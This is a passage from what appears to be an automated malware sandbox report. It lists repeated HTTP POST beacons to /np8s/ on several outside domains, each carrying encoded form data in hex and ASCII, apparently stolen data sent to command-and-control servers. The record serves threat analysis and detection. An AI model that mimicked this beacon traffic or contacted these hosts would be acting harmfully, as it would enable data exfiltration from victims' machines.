57 51 6e 7a 37 69 45 62 32 43 70 51 4d 48 77 41 62 2d 52 4b 49 57 5a 6f 31 74 30 59 6c 68 6f 74 49 49 53 65 79 71 70 5a 55 6e 55 34 6b 5f 55 6e 46 46 48 56 70 52 6a 33 6d 59 74 44 6a 4c 59 4b 63 33 62 6f 44 71 4b 53 34 66 68 4f 78 71 55 6c 36 75 76 54 70 49 32 59 78 38 6a 4b 68 65 6c 50 46 73 74 49 31 59 47 6b 50 68 46 79 55 44 6f 4e 4f 70 74 52 70 54 39 6f 7e 73 28 4e 6a 62 55 44 61 67 76 6e 4f 70 30 37 71 6e 79 43 7a 76 54 65 36 42 77 63 66 37 51 51 77 6d 28 47 4c 56 70 73 28 41 7a 33 43 36 4d 6d 7e 65 4b 78 7e 77 61 49 54 4d 58 36 53 49 6f 33 76 54 51 32 68 50 35 31 59 52 30 6c 58 5f 51 59 56 6d 44 51 63 76 4e 4a 47 69 34 77 68 61 43 31 6b 59 4e 54 28 6c 4d 34 7a 41 50 56 32 4f 68 75 4b 30 62 50 35 76 41 73 58 30 48 48 77 37 52 57 78 56 4c 4f 76 4e 37 36 37 35 79 4a 5a 75 6a 34 6e 33 46 6b 65 41 74 32 6d 49 76 4a 39 6f 35 55 4a 49 58 78 64 61 36 6a 31 52 35 2d 45 62 6a 33 49 76 77 5a 43 47 6c 78 73 7a 5a 70 48 50 4e 64 71 65 6a 6c 79 54 30 32 42 39 6c 57 73 50 56 4b 7e 56 73 61 54 43 6d 7a 51 68 59 38 79
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.localbloom.onlineConnection: closeContent-Length: 416Cache-Control: no-cacheOrigin: http://www.localbloom.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.localbloom.online/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 68 62 51 6a 45 64 37 4f 55 73 31 78 6c 61 46 55 36 51 47 50 31 73 33 44 33 6f 39 35 66 51 5a 58 33 30 42 61 73 6c 52 6c 74 6f 63 45 41 68 31 75 4d 67 6f 45 50 46 55 61 4f 4b 4d 63 6b 6a 4e 79 44 6b 7e 62 44 79 68 4f 66 59 51 73 46 65 52 36 78 57 55 33 43 52 39 57 46 51 68 75 67 6a 48 37 6b 68 36 55 62 74 78 5a 54 32 52 67 4c 51 75 63 59 53 4f 58 4a 35 55 75 46 58 69 6a 28 67 61 63 73 4c 59 4a 4a 49 59 36 4e 55 34 4f 54 74 6c 53 39 35 77 70 36 69 55 67 64 4d 6c 77 4b 46 64 77 79 73 63 50 4c 50 4f 39 38 5f 50 67 70 61 33 56 59 67 57 6d 5a 6c 46 41 6f 4f 78 76 28 6c 6a 4b 36 38 51 4b 6a 5f 54 78 43 66 49 65 61 42 71 6c 66 55 59 56 35 38 54 4b 47 43 30 4d 6f 52 71 49 53 70 72 56 36 46 54 77 42 57 69 44 35 38 42 4f 44 61 43 4d 7e 6c 68 45 6f 63 45 7a 46 66 7a 43 54 63 58 66 6c 4e 4f 71 34 4e 61 74 7a 33 4d 48 43 33 34 41 6f 54 34 30 47 59 6a 6f 65 56 66 4c 79 37 58 5a 7a 33 4d 65 74 50 4b 33 57 62 54 39 76 5a 69 78 6e 48 31 73 45 6a 36 78 70 6b 56 59 54 51 6c 51 37 63 4b 47 49 6f 67 68 64 67 4b 4d 6b 41 68 4c 6c 51 6c 69 72 34 49 71 7e 30 30 66 4e 41 43 63 71 37 28 42 78 6c 56 4e 43 33 32 49 34 71 6f 55 75 74 44 68 6b 51 36 62 4d 7a 66 78 4c 75 43 49 43 4a 74 58 70 41 38 71 63 6f 76 38 75 45 55 57 39 77 6b 2e 00 00 00 00 00 00 00 00 Data Ascii: 
3fk4oN=hbQjEd7OUs1xlaFU6QGP1s3D3o95fQZX30BaslRltocEAh1uMgoEPFUaOKMckjNyDk~bDyhOfYQsFeR6xWU3CR9WFQhugjH7kh6UbtxZT2RgLQucYSOXJ5UuFXij(gacsLYJJIY6NU4OTtlS95wp6iUgdMlwKFdwyscPLPO98_Pgpa3VYgWmZlFAoOxv(ljK68QKj_TxCfIeaBqlfUYV58TKGC0MoRqISprV6FTwBWiD58BODaCM~lhEocEzFfzCTcXflNOq4Natz3MHC34AoT40GYjoeVfLy7XZz3MetPK3WbT9vZixnH1sEj6xpkVYTQlQ7cKGIoghdgKMkAhLlQlir4Iq~00fNACcq7(BxlVNC32I4qoUutDhkQ6bMzfxLuCICJtXpA8qcov8uEUW9wk.
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.localbloom.onlineConnection: closeContent-Length: 36488Cache-Control: no-cacheOrigin: http://www.localbloom.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.localbloom.online/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 68 62 51 6a 45 59 54 69 62 5f 78 73 37 61 4a 6e 33 46 53 62 36 38 6e 37 31 59 34 6f 54 79 74 55 6d 32 70 4f 69 46 67 56 73 70 6b 6b 48 53 42 50 49 6e 6c 52 50 42 5a 2d 4b 5f 6b 59 33 54 42 7a 44 6b 33 36 44 79 6c 4f 65 59 49 61 46 2d 68 45 79 31 73 30 45 78 39 6d 45 51 68 4e 6b 6e 48 47 6b 68 75 36 62 74 35 7a 54 6d 64 67 4e 7a 47 63 4d 68 6d 63 55 4a 55 6b 5a 48 79 5f 69 77 47 72 73 4c 51 72 4a 49 6b 36 4f 6b 30 4f 56 4e 31 64 32 61 59 6d 39 79 55 68 58 73 6c 70 54 56 67 4a 79 73 49 74 4c 4f 79 39 39 4e 62 67 34 61 58 56 61 52 57 6e 57 31 46 5a 73 4f 78 75 37 6c 28 62 36 38 4d 4f 6a 37 71 47 43 4f 38 65 49 68 71 67 59 47 35 71 71 37 48 5a 45 43 42 63 6f 52 6d 74 63 64 79 54 36 42 43 72 58 54 76 37 37 65 70 77 44 59 75 6d 79 6c 68 41 39 73 46 6e 46 66 79 5f 54 63 58 68 6c 4e 65 71 34 4c 61 74 7a 58 38 48 45 48 34 42 30 6a 34 78 4d 34 6a 33 61 56 6a 76 79 36 28 6f 7a 32 6c 37 71 36 6d 33 58 50 37 39 6e 62 4b 79 77 48 30 70 42 6a 36 52 7e 30 55 50 54 51 6c 32 37 64 4b 6f 49 2d 6b 68 50 46 6d 4d 6a 6d 56 4c 70 41 6c 69 6b 59 49 73 72 45 34 50 4e 41 61 59 71 37 50 72 78 57 35 4e 42 6c 7e 49 37 4c 6f 55 39 4e 44 68 6f 77 37 5a 66 6a 7a 31 4f 38 37 44 42 5a 56 4e 30 67 30 41 55 34 4f 79 35 6d 30 67 71 48 30 47 4b 57 50 51 37 77 6f 37 4f 4b 45 62 79 49 28 36 4e 41 4e 6d 6d 57 68 41 71 49 37 56 55 47 76 78 4a 6d 76 55 54 58 39 42 72 79 63 47 56 39 34 65 37 6c 45 44 49 69 37 5a 64 44 76 59 43 41 52 39 39 4f 4f 2d 61 75 7e 47 6b 68 63 77 5a 32 6e 5a 57 34 43 32 52 78 41 44 68 65 4e 66 38 31 76 70 69 61 52 78 52 42 53 72 58 
6c 66 68 73 6e 39 53 47 37 32 74 51 35 33 36 6b 50 6b 68 36 6b 73 59 7a 2d 30 48 43 45 55 4c 63 52 48 6f 7a 6a 58 63 4d 45 6f 75 70 36 48 4d 72 44 71 59 6c 4e 49 6c 51 38 63 43 6d 32 51 44 4b 52 47 66 74 6e 62 63 6e 4b 32 55 67 6a 47 70 4e 33 4d 37 6d 42 38 4f 77 53 64 7a 30 69 46 73 4a 70 70 6f 64 45 47 4a 6a 69 36 4a 64 43 4e 6e 70 7a 71 69 62 66 4f 4f 53 67 69 33 56 54 68 37 6f 76 4e 4b 68 5f 73 42 66 34 33 6e 4e 4d 35 34 4b 38 75 66 61 44 41 6d 73 64 62 62 31 57 36 54 53 67 6f 4d 71 75 64 66 28 77 59 2d 6a 72 48 65 4b 33 6a 6c 57 6e 65 39 74 2d 45 77 30 58 66 53 74 4b 61 70 6c 34 4b 6b 4d 59 76 69 43 5f 7e 75 72 45 64 48 63 71 56 44 6b 4b 4f 56 4f 6d 42 41 54 47 4c 37 59 30 35 68 61 77 5a 55 32 74 61 38 6d 4f 50 58 4f 58 47 64 67 33 46 4e 49 51 46 65 30 2d 5a 45 6b 74 6e 57 65 45 30 78 6a 31 78 76 39 39 56 6d 4d 76 55 6c 71 6b 56 6f 63 6f 4b 43 6d 58 78 67 44 59 4d 34 62 73 4a 44 4c 51 37 55 30 6a 4d 6d 61 6b 6c 6e 74 6e 32 78 33 4c 79 7a 45 44 64 4b 4a 35 69 57 49 39 57 6a 44 46 6f 64 4e 4f 61 58 32 43
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.shcylzc.comConnection: closeContent-Length: 416Cache-Control: no-cacheOrigin: http://www.shcylzc.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.shcylzc.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 35 37 38 43 41 37 64 6f 71 73 77 42 30 65 58 78 49 41 71 33 6c 4d 56 78 56 71 76 4e 30 54 4c 59 33 6d 65 37 7a 36 42 34 6d 46 4a 4c 68 34 50 2d 4a 68 45 6e 37 35 7e 32 5a 75 6a 48 67 38 61 4b 63 59 67 32 44 37 55 41 57 5a 74 70 31 79 56 53 65 68 62 54 47 71 46 36 6a 63 6c 79 37 72 66 33 78 6a 45 59 33 51 71 30 65 61 49 59 31 68 43 71 64 4f 67 5f 62 52 71 32 63 54 41 4f 4c 63 58 66 6a 79 70 56 68 45 33 6b 6a 71 75 51 42 72 36 39 69 56 4f 4e 66 49 69 35 46 70 69 33 50 65 37 7a 48 34 53 32 33 33 77 48 4d 2d 78 55 72 47 4c 2d 72 48 45 74 77 43 53 4a 56 67 62 56 62 5f 59 42 74 65 57 50 44 37 6d 46 4f 4a 73 6f 4f 64 6c 76 58 68 31 6e 6c 4d 4b 62 39 6d 58 61 66 72 52 68 50 69 50 46 6a 4b 36 61 6e 5a 37 6a 66 33 65 66 62 56 57 76 50 75 32 6d 31 38 34 6f 67 42 45 42 72 4c 36 30 70 62 51 69 6a 58 66 73 44 76 47 51 51 6a 38 77 41 6f 51 4c 7e 42 61 6c 4b 79 65 32 63 67 42 5f 33 71 65 6e 46 56 6d 6e 6a 34 74 54 30 72 76 38 6a 61 45 4d 35 77 39 63 39 4c 68 42 67 79 44 58 43 6d 36 66 49 72 44 64 31 7a 71 7a 68 61 41 31 39 52 78 54 62 41 54 5f 52 62 4d 53 51 5f 49 36 6a 77 70 6c 56 57 39 76 70 75 49 69 72 36 74 37 56 4a 59 74 72 2d 37 56 50 68 4c 35 37 67 59 5a 35 6f 54 53 50 6d 6b 74 6b 45 28 52 4b 73 28 77 54 45 30 2e 00 00 00 00 00 00 00 00 Data Ascii: 
3fk4oN=578CA7doqswB0eXxIAq3lMVxVqvN0TLY3me7z6B4mFJLh4P-JhEn75~2ZujHg8aKcYg2D7UAWZtp1yVSehbTGqF6jcly7rf3xjEY3Qq0eaIY1hCqdOg_bRq2cTAOLcXfjypVhE3kjquQBr69iVONfIi5Fpi3Pe7zH4S233wHM-xUrGL-rHEtwCSJVgbVb_YBteWPD7mFOJsoOdlvXh1nlMKb9mXafrRhPiPFjK6anZ7jf3efbVWvPu2m184ogBEBrL60pbQijXfsDvGQQj8wAoQL~BalKye2cgB_3qenFVmnj4tT0rv8jaEM5w9c9LhBgyDXCm6fIrDd1zqzhaA19RxTbAT_RbMSQ_I6jwplVW9vpuIir6t7VJYtr-7VPhL57gYZ5oTSPmktkE(RKs(wTE0.
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.shcylzc.comConnection: closeContent-Length: 36488Cache-Control: no-cacheOrigin: http://www.shcylzc.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.shcylzc.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 35 37 38 43 41 36 4d 72 31 73 55 45 33 4f 61 68 62 69 71 6a 74 64 6c 33 54 4b 72 43 37 7a 6e 4c 67 48 4f 33 39 62 77 65 6e 45 77 4d 6b 49 53 59 4e 69 30 76 37 39 32 50 44 73 33 44 6e 63 57 56 63 5a 49 49 44 37 41 41 58 61 38 30 79 52 64 72 5a 48 76 51 42 4b 45 66 67 63 6c 76 77 4a 72 65 78 6a 42 5f 33 51 69 43 64 70 73 59 6e 33 47 71 62 4e 59 6c 46 42 71 77 64 54 51 43 50 63 71 67 6a 78 59 4b 68 42 50 6b 6a 61 79 51 41 49 53 36 70 30 4f 53 62 59 6a 7a 41 70 69 75 61 4f 28 42 48 34 6e 56 33 32 4d 48 4d 4c 68 55 71 53 37 2d 28 6b 63 75 6f 69 53 41 52 67 62 53 52 66 56 48 74 64 6a 64 44 2d 47 37 4e 38 73 6f 50 74 6c 71 64 51 77 61 79 76 54 62 28 6d 6a 74 66 72 74 45 4f 7a 6a 64 6a 49 50 4c 77 36 79 62 51 31 32 35 62 58 37 79 4a 4f 32 69 39 63 34 76 67 42 45 48 72 4c 37 58 70 62 41 69 6a 55 28 73 44 4e 75 51 59 7a 38 7a 4c 6f 51 4f 77 68 61 36 63 43 53 4b 63 68 70 76 33 75 43 4a 51 77 71 6e 6c 71 6c 54 79 4b 75 71 72 71 45 56 38 77 39 61 33 72 68 34 67 79 44 68 43 6e 36 50 49 34 33 64 7a 69 71 7a 6d 38 38 31 6d 42 78 54 51 67 54 39 4b 4c 42 4b 51 2d 73 2d 6a 31 74 66 57 68 46 76 75 39 77 69 72 62 74 37 55 5a 59 74 7e 75 36 41 48 43 6a 38 35 52 59 66 35 4b 54 70 53 6d 41 47 67 6c 4b 49 58 50 72 34 46 6b 42 48 4f 4c 44 6e 4e 73 49 66 51 55 35 52 44 4d 6a 61 28 50 72 47 51 33 6c 43 34 42 69 39 42 50 78 41 33 39 62 43 6b 51 49 4a 42 74 4f 52 55 41 31 75 68 74 6a 78 6d 35 52 65 46 55 7e 67 42 6f 4e 6f 44 65 6b 79 78 6f 7e 35 32 68 42 6f 70 33 62 6b 57 5a 63 34 4d 64 50 65 62 50 4f 6e 72 47 43 56 78 61 6b 47 6f 51 32 6e 79 5a 48 49 53 65 39 
4e 53 4b 7e 6f 67 31 44 57 6b 33 34 76 58 43 74 6d 6b 5a 53 7a 33 6b 73 75 55 72 31 66 76 47 69 78 37 50 4f 43 65 34 70 63 52 72 6c 4d 75 32 4e 73 38 57 5a 44 4c 4a 5a 30 39 79 34 74 74 67 4a 5f 69 4e 54 6b 55 38 4e 34 6d 31 75 4e 54 48 59 68 66 30 36 4d 76 4d 48 33 49 36 44 36 72 48 42 39 6a 4d 76 48 78 7a 64 4d 74 35 6d 79 78 37 68 43 55 74 64 50 55 38 52 4e 47 78 73 44 75 45 41 70 51 50 77 72 75 48 41 31 70 76 58 66 4d 36 65 4d 42 79 45 49 64 42 42 64 73 47 4e 6d 76 63 4f 45 45 71 56 49 6e 57 68 6e 63 4c 31 53 67 72 70 68 69 6f 28 34 45 33 54 55 41 52 69 30 64 6d 75 4c 78 74 4b 55 70 61 4b 5f 38 4c 4f 6a 73 30 50 75 45 74 43 50 6d 4d 6a 66 49 31 34 33 33 73 39 52 33 50 58 33 63 30 78 59 43 36 78 68 63 44 45 6b 6d 41 6c 34 38 4e 7e 46 5a 2d 66 69 76 77 64 4c 62 73 50 2d 38 61 48 4a 65 6c 52 44 46 37 38 56 77 41 55 79 41 30 76 4f 51 74 39 56 34 4f 42 6e 75 71 28 42 75 4c 33 37 6f 65 33 64 72 34 39 61 70 67 4f 4c 6b 72 44 45 76 4d 46 4f 58 42 59 71 66 33 69 38 43 50 51 49 44 49 78 50 6a 42 54 62 6e 41 78 4c
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.getbusinesscreditandfunding.comConnection: closeContent-Length: 416Cache-Control: no-cacheOrigin: http://www.getbusinesscreditandfunding.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.getbusinesscreditandfunding.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 37 72 64 58 7e 50 67 4f 4b 39 5a 4d 4b 38 4c 33 34 6a 6a 70 28 58 71 57 4e 59 56 34 68 46 49 57 6a 57 70 7a 75 61 57 4a 47 72 50 32 58 56 56 43 62 71 76 77 6d 6d 4a 67 39 5f 47 42 4b 42 67 6c 30 64 4c 55 70 6b 59 42 79 67 74 65 38 6a 7a 41 58 31 6c 70 68 63 70 72 7a 4d 28 5f 59 6b 61 36 72 4f 4f 73 39 65 6b 4c 32 76 52 79 46 39 36 61 75 2d 51 38 61 46 77 78 66 6d 65 63 65 63 52 46 76 67 69 78 57 6b 47 6b 62 58 64 50 69 2d 38 53 68 58 35 6e 56 65 76 77 67 75 32 37 6d 5f 79 77 4d 32 31 6f 51 48 66 6c 70 69 35 50 79 59 73 56 50 30 4c 51 57 43 70 2d 61 6c 54 44 5a 46 62 4c 72 57 4f 63 6c 79 6f 49 68 53 55 4d 4a 2d 35 69 4b 63 34 53 66 4b 51 34 47 67 54 34 43 48 53 59 62 39 56 44 61 37 4b 79 48 57 63 50 37 74 28 78 33 30 38 6f 70 63 6a 58 37 41 65 69 78 54 47 6f 52 31 4a 49 45 79 42 38 65 31 5a 71 5a 50 56 49 4e 32 67 4d 72 4f 43 58 67 61 76 78 42 34 66 69 39 4d 30 70 33 49 52 39 38 43 65 65 52 6c 39 74 47 62 6b 6c 73 79 32 36 47 41 34 4a 70 5a 61 36 78 5a 34 7a 70 4e 78 70 71 73 6e 69 47 47 62 77 39 4e 28 4e 31 38 74 6f 62 46 77 67 4d 46 30 52 4c 4e 34 44 37 66 32 64 38 71 63 44 4c 70 55 5a 58 38 73 48 43 7a 6c 4e 50 71 69 32 55 38 72 6f 79 4a 65 49 73 52 72 76 6c 70 49 6e 51 68 4c 62 45 44 52 33 6c 52 4d 2e 00 00 00 00 00 00 00 00 Data Ascii: 
3fk4oN=7rdX~PgOK9ZMK8L34jjp(XqWNYV4hFIWjWpzuaWJGrP2XVVCbqvwmmJg9_GBKBgl0dLUpkYBygte8jzAX1lphcprzM(_Yka6rOOs9ekL2vRyF96au-Q8aFwxfmececRFvgixWkGkbXdPi-8ShX5nVevwgu27m_ywM21oQHflpi5PyYsVP0LQWCp-alTDZFbLrWOclyoIhSUMJ-5iKc4SfKQ4GgT4CHSYb9VDa7KyHWcP7t(x308opcjX7AeixTGoR1JIEyB8e1ZqZPVIN2gMrOCXgavxB4fi9M0p3IR98CeeRl9tGbklsy26GA4JpZa6xZ4zpNxpqsniGGbw9N(N18tobFwgMF0RLN4D7f2d8qcDLpUZX8sHCzlNPqi2U8royJeIsRrvlpInQhLbEDR3lRM.
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.getbusinesscreditandfunding.comConnection: closeContent-Length: 36488Cache-Control: no-cacheOrigin: http://www.getbusinesscreditandfunding.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.getbusinesscreditandfunding.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 37 72 64 58 7e 4b 68 46 41 73 46 46 50 73 4f 6e 36 57 48 39 33 45 79 51 4c 6f 68 39 39 30 49 7a 30 58 34 45 71 62 6e 37 48 71 32 78 54 6c 35 6a 66 70 66 6f 6d 69 46 46 7a 74 69 64 5a 52 73 71 30 5a 76 2d 70 6b 63 42 7a 67 30 62 28 45 33 6d 58 58 39 71 73 63 70 58 79 4d 7e 38 4f 6d 7e 62 72 4f 37 4c 39 65 63 62 32 65 39 79 45 66 43 61 6f 39 34 33 48 31 78 62 42 33 79 51 42 73 63 70 76 6b 32 35 57 6b 4b 6b 62 6e 52 50 6a 65 4d 4e 32 41 46 6d 59 75 76 70 6c 75 33 72 39 76 50 57 4d 32 78 4b 51 47 7a 6c 71 51 64 50 79 49 4d 56 59 33 7a 54 59 53 70 5f 65 6c 54 53 64 46 65 4e 72 58 69 51 6c 33 45 32 68 67 49 4d 49 4f 35 76 49 37 45 72 56 37 52 75 4c 41 50 66 43 48 65 39 62 73 49 63 61 2d 79 53 48 67 59 30 6c 34 4c 4c 33 32 52 5f 76 38 6a 54 7a 67 65 35 78 54 47 4d 52 31 4a 32 45 79 52 38 65 32 70 71 49 65 6c 49 64 57 67 4c 6e 4f 43 53 6f 36 76 69 4d 59 6a 43 39 4d 73 66 33 4a 70 54 37 77 65 65 52 32 56 74 41 36 6b 6d 31 53 32 38 44 41 34 70 74 5a 61 6c 78 5a 34 42 70 4d 78 35 71 37 76 69 63 33 62 77 35 76 48 4e 6c 63 74 6f 65 46 77 69 46 6c 35 55 4c 4e 51 48 37 65 47 6a 38 35 77 44 4c 37 4d 5a 57 64 73 48 46 44 6c 4e 41 4b 6a 6f 61 5a 62 6a 78 4f 33 2d 69 67 37 5a 6d 72 6b 54 61 57 28 54 57 52 34 74 35 6d 38 39 4e 2d 32 54 74 73 43 34 79 68 41 69 35 6c 45 49 79 77 47 76 35 4d 7a 69 33 49 49 52 47 53 34 33 7e 5a 6c 47 54 46 57 72 47 36 45 7a 4d 71 36 4a 63 62 53 36 6c 67 4d 7a 6a 41 71 34 28 4f 53 58 68 47 51 6f 7e 4b 31 43 73 55 4f 57 55 67 45 6e 6d 41 4e 63 46 51 6f 37 59 33 48 
73 58 58 76 64 6d 6b 55 58 4c 58 48 51 67 51 61 49 56 4d 30 50 59 59 54 77 7e 39 36 73 77 69 73 79 74 72 42 71 4a 43 4d 5a 59 6c 6b 54 44 4f 73 30 41 35 5a 59 69 51 6e 73 58 67 48 6b 34 47 63 36 6e 56 6d 42 31 31 52 58 63 6c 68 2d 34 70 6e 76 68 4d 36 64 58 4f 41 79 4e 42 46 5a 79 49 66 36 6d 52 50 77 58 61 37 71 32 74 61 5f 62 4a 5a 51 6d 32 41 65 6b 65 39 43 38 6a 32 66 61 65 42 5a 76 46 6b 74 49 70 43 39 68 62 32 74 45 57 64 66 78 6e 4b 39 76 6b 34 4b 49 6d 5a 79 70 42 30 74 5a 31 55 75 47 70 68 46 54 58 72 4d 39 47 53 42 61 70 43 57 35 58 65 47 4c 4d 35 6f 38 2d 41 31 30 61 43 61 67 57 50 70 59 7a 50 78 66 50 33 6a 39 52 45 50 28 62 28 48 63 72 76 41 49 5a 41 50 4c 52 52 43 6a 61 61 79 76 43 61 58 77 64 38 31 62 56 68 4a 5a 69 77 5f 78 52 64 70 6a 6e 32 57 35 68 4b 2d 56 74 4b 54 6e 73 7a 4d 70 43 43 56 71 33 7a 4c 74 79 64 38 41 30 43 4b 6a 31 4c 68 28 6f 68 68 6e 56 49 75 4e 76 6f 45 4f 52 67 72 75 76 50 64 33 63 47 39 66 55 4a 4e 41 56 52 78 4e 76 68 6a 6b 6b 6c 35 63 79 46 35 4e 36 57 33 67 75 68 57
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.xn--wsthof-camping-gsb.comConnection: closeContent-Length: 416Cache-Control: no-cacheOrigin: http://www.xn--wsthof-camping-gsb.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.xn--wsthof-camping-gsb.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 36 50 59 59 32 35 41 38 67 69 31 56 50 41 78 37 71 38 71 74 49 58 58 64 72 4f 73 39 35 50 68 32 58 64 62 7a 44 72 76 2d 6e 75 58 48 7e 68 55 51 4c 59 6e 6d 54 67 36 6a 69 38 74 4f 6f 6f 35 75 36 46 70 62 6b 6c 38 74 7a 47 62 35 61 4b 77 58 66 74 70 39 57 6e 30 4f 49 70 33 48 47 4c 79 76 69 73 4e 6a 56 33 57 41 74 55 6f 38 66 4e 31 72 75 6d 71 54 32 76 71 78 49 6b 79 6e 28 71 4d 38 72 77 77 44 6f 4c 73 4a 67 4d 33 32 37 79 73 45 45 41 36 69 57 4c 6e 4b 55 78 65 75 6c 65 6b 71 43 4b 51 76 59 30 4b 74 5a 56 4a 74 58 4e 57 42 50 7a 46 76 76 4b 38 69 51 48 61 63 76 79 6e 32 41 37 41 70 52 6d 7e 56 72 49 4c 33 32 71 46 44 6e 57 6b 77 31 51 59 74 42 5f 68 4d 78 33 4b 74 7e 6e 36 52 46 4c 74 57 68 31 53 37 36 2d 39 51 75 7a 62 70 34 34 53 5a 42 57 33 64 58 49 46 65 62 31 30 35 30 70 45 41 5a 48 66 62 38 72 71 47 51 78 70 47 49 6e 52 79 62 31 43 6f 65 31 6a 48 52 76 62 50 57 6a 51 49 71 52 6e 36 63 48 66 5f 73 6a 7e 6e 28 6b 68 66 33 6c 79 4e 28 51 4b 46 62 4f 4c 7a 73 5a 4c 4e 4b 4d 58 75 52 36 74 31 7e 34 54 6c 57 57 6c 6b 73 78 67 73 6b 4a 78 72 34 48 75 72 6f 78 44 41 37 62 74 41 37 59 6a 48 73 4d 4a 48 79 4d 64 49 44 77 68 78 4e 39 75 6f 43 34 35 78 4b 35 54 5a 41 62 4e 75 30 4e 4b 39 46 4d 4a 6b 51 74 45 2e 00 00 00 00 00 00 00 00 Data Ascii: 
3fk4oN=6PYY25A8gi1VPAx7q8qtIXXdrOs95Ph2XdbzDrv-nuXH~hUQLYnmTg6ji8tOoo5u6Fpbkl8tzGb5aKwXftp9Wn0OIp3HGLyvisNjV3WAtUo8fN1rumqT2vqxIkyn(qM8rwwDoLsJgM327ysEEA6iWLnKUxeulekqCKQvY0KtZVJtXNWBPzFvvK8iQHacvyn2A7ApRm~VrIL32qFDnWkw1QYtB_hMx3Kt~n6RFLtWh1S76-9Quzbp44SZBW3dXIFeb1050pEAZHfb8rqGQxpGInRyb1Coe1jHRvbPWjQIqRn6cHf_sj~n(khf3lyN(QKFbOLzsZLNKMXuR6t1~4TlWWlksxgskJxr4HuroxDA7btA7YjHsMJHyMdIDwhxN9uoC45xK5TZAbNu0NK9FMJkQtE.
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.xn--wsthof-camping-gsb.comConnection: closeContent-Length: 36488Cache-Control: no-cacheOrigin: http://www.xn--wsthof-camping-gsb.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.xn--wsthof-camping-gsb.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 36 50 59 59 32 38 34 32 6c 54 59 4a 46 77 4e 59 74 4f 61 35 52 30 66 66 6e 65 6f 69 6e 2d 68 54 54 6f 28 4e 65 5f 6a 70 32 63 47 43 7a 78 4a 77 42 2d 33 49 54 68 4b 5a 6f 5a 46 4b 69 6f 6c 74 36 42 4e 35 6b 6c 34 74 79 47 7a 70 61 73 68 4d 62 34 31 79 51 48 31 31 5a 5a 32 5a 43 4b 76 39 69 73 59 32 56 33 65 51 74 45 38 38 65 76 64 72 6f 6e 72 66 34 76 72 34 41 45 43 37 37 71 51 68 72 7a 41 62 6f 4f 55 4a 68 38 4c 32 36 54 63 62 54 54 69 6c 4a 37 6e 4c 52 78 66 36 73 37 38 2d 43 4b 45 52 59 32 4f 74 5a 6d 74 74 57 63 32 42 62 51 74 73 33 4b 38 6e 55 48 61 62 72 79 72 6e 41 37 63 31 52 6b 53 76 72 35 28 33 33 61 46 43 67 46 31 4e 77 48 4e 72 48 5f 46 72 78 33 50 78 7e 32 6d 7a 46 4b 41 33 32 58 62 50 7e 63 45 46 75 31 43 79 36 59 53 6e 4b 32 33 43 58 49 46 2d 62 31 30 48 30 70 30 41 5a 46 28 62 7e 4f 4f 47 53 42 70 48 55 58 52 39 44 6c 43 6e 61 31 76 65 52 76 53 77 57 68 52 64 71 6a 48 36 63 55 6e 5f 38 79 7e 67 33 55 68 6a 37 46 7a 4b 37 51 4c 4c 62 4f 4c 46 73 64 66 64 4a 39 48 75 58 2d 35 31 7a 36 37 6c 55 6d 6c 6b 69 52 67 75 76 70 39 37 34 48 32 56 6f 77 7a 32 34 71 6c 41 7e 65 33 48 73 70 39 48 7a 63 64 49 59 41 67 50 4f 38 66 77 48 61 46 32 42 37 7a 76 64 35 6c 6b 75 38 48 78 47 70 4e 42 4b 36 59 50 67 70 30 4b 45 51 57 57 39 77 50 31 64 71 75 77 6c 5a 4d 6d 56 30 49 34 28 6e 50 56 5a 4d 44 69 77 47 43 76 6d 32 6a 54 55 34 73 58 49 4c 66 53 67 7a 65 44 57 64 64 5f 71 6a 48 73 44 36 6b 42 36 33 61 53 35 73 53 37 4d 4e 31 48 7e 70 31 31 78 67 6d 7a 56 56 33 69 6c 6f 43 5f 7a 63 64 62 
